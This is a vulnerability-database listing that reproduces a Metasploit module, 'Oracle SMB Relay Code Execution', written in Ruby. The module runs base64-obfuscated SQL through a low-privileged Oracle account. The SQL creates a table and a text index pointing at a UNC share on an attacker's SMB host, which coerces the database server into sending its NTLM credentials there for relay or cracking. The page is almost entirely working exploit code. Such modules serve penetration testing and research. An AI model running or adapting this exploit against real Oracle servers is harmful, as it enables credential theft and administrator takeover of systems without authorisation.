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Oracle SMB Relay Code Execution

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
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Oracle SMB Relay Code Execution| Metasploit module for obtaining Administrator access to the server by exploiting Oracle SMB Relay vulnerabilit

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::ORACLE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Oracle SMB Relay Code Execution',  
'Description' => %q{  
This module will help you to get Administrator access to OS using an unprivileged  
Oracle database user (you need only CONNECT and RESOURCE privileges).  
To do this you must firstly run smb_sniffer or smb_relay module on your sever.  
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb  
which will connect to your SMB sever with credentials of Oracle RDBMS.  
So if smb_relay is working, you will get Administrator access to server which  
runs Oracle. If not than you can decrypt HALFLM hash.  
},  
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],  
],  
'DisclosureDate' => '2009-04-07'))  
  
register_options(  
[  
OptString.new('IP', [ false, 'IP address of SMB proxy.', '0.0.0.0' ]),  
])  
end  
  
def run  
return if not check_dependencies  
  
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
  
prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"  
prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"  
  
exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"  
  
prp = Rex::Text.encode_base64(prepare)  
prp1 = Rex::Text.encode_base64(prepare1)  
exp1 = Rex::Text.encode_base64(exploiting1)  
  
sql = %Q|  
DECLARE  
#{rand1} VARCHAR2(32767);  
#{rand2} VARCHAR2(32767);  
#{rand3} VARCHAR2(32767);  
BEGIN  
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));  
EXECUTE IMMEDIATE #{rand1};  
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));  
EXECUTE IMMEDIATE #{rand2};  
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));  
EXECUTE IMMEDIATE #{rand3};  
END;  
|  
  
begin  
print_status("Executing #{self.name}...")  
prepare_exec(sql)  
rescue => e  
return  
end  
  
end  
end  
`

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31 Aug 2024 00:00Current
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